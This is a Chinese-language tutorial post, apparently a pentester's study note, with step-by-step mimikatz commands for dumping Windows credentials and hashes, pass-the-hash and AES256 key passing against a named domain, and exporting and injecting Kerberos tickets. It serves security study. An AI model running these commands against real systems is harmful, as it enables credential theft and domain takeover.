mimikatz使用哈希 ntlm传递 票据传递
(1)管理员运行
(2)必须输入
privilege::debug
(3)在目标主机使用mimikatz获取ntlm hash
winserver 2012R2 之前版本 可以获取到明文密码
sekurlsa::logonpasswords
(4) 哈希传递 将哈希值 传递到其他计算机上 进行登录域控验证
sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6d043
mimikatz执行后 会弹出一个拥有对应 hash用户权限的 cmd窗口
可看到 弹出 域控的 cmd权限
(5) aes-256密钥
使用 mimikatz抓取密钥
sekurlsa::ekeys
获取到 aes-25后
sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /aes256:“aes256的值”
需要目标机器上安装 KB2871997补丁 安装了 该补丁后 ,就可以通过AES256密钥 进行哈希传递啦。
票据传递
privilege::debug
sekurlsa::tickets /export
执行该命令后 会在当前目录生成多个服务的票据文件 例如 kirbi等
使用以下命令 清楚 内存中的票据
kerberos::purge
将票据文件注入内存
kerberos::ptt “[0;4beae]-2-0-40e00000-Administrator@krbtgt-YXY.YOUTHBELIEF.COM.kirbi”
“文件名”
在当前终端 退出 mimikatz 然后就可以列出目标目录啦。
除了mimikatz工具 还可以用 kekeo传递票据。
mimikatz使用哈希 ntlm传递 票据传递相关推荐
- 【内网学习笔记】21、哈希传递与票据传递
1.哈希传递 哈希传递(Pass The Hash, PTH)顾名思义,就是利用哈希去登录内网中的其他机器,而不是通过明文密码登录的方式. 通过哈希传递,攻击者不需要花时间破解哈希值得到明文,在Win ...
- 【内网安全】域横向PTHPTKPTT哈希票据传递
Kerberos协议具体工作方法,在域中,简要介绍一下: • 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测 ...
- 内网域横向PTHPTKPTT哈希票据传递
内网域横向PTH&PTK&PTT哈希票据传递 文章目录 内网域横向PTH&PTK&PTT哈希票据传递 PTH,PTT,PTK概念: 总结:KB2871997 补丁后的影 ...
- 哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较
Mimikatz在本文章中会用到的命令 privilege::debug #提升权限 sekurlsa::logonpasswords #抓取密码信息 sekurlsa::msv #抓取LM.NTLM ...
- 【内网渗透】域横向PTHPTKPTT哈希票据传递
目录 0x001 相关知识 0x002 域横向移动PTH NTML传递 0x003 域横向移动PTK aes256传递 0x004 域横向移动PTT哈希票据传递-ms14068&kekeo&a ...
- 内网横向移动|PTT票据传递横向|Mimikatz Kerberos
票据传递攻击(Pass the Ticket,PtT) 票据传递攻击(PtT)是基于Kerberos认证的一种攻击方法,常用来做后渗透权限维持,黄金票据攻击利用的前提是得到了域内krbtgt用户的NT ...
- 内网渗透- *** PTH(传递哈希)***PTT(传递票据)***PTK(传递密钥)
目录 PTH(pass-the-hash)传递哈希 Mimikatz wmiexec 第一种: 第二种: CrackMapExec PTT(pass the ticket) 传递票据
- 内网渗透之PPT票据传递攻击(Pass the Ticket)
文章目录 内网渗透之PPT票据传递攻击(Pass the Ticket) 前言 Kerberos 协议& Kerberos 认证原理 Kerberos 认证原理 ASREQ & ASR ...
- 域渗透PTT票据传递攻击(Pass the Ticket)
文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精:本文中提到的任何技术都源 ...
最新文章
- Java IO流-File类
- 搭建consul 集群
- Windows Server 2012正式版RDS系列④
- HDU 1043 Eight(八数码)
- CSS布局之脱离文档流详解——浮动、绝对定位脱离文档流的区别
- ZOJ 3735 Josephina and RPG
- 微软开源的Trill是什么?
- 想要成为真正优秀的程序员是不是真的很难?
- 字节还有打游戏、听音乐这种神仙工作?
- javascript闭包(Module模式)的用途和高级使用方式
- 深度学习系列资料总结
- 堆和栈内存扩展方向问题
- iS3 岩石隧道数据准备手册
- 通过堡垒机rdp 黑屏_如何绕过堡垒机远程登录
- 小牛采购管理系统 v3.01 bt
- http和https请求工具类
- 阿里云使用体验-阿里云开发者社区
- Docker介绍与使用
- 毕业设计之外文翻译(工具篇)
- linux 磁盘压测工具 fps,荣耀MagicBook Pro锐龙版性能评测,可媲美MX150 2GB核心显卡...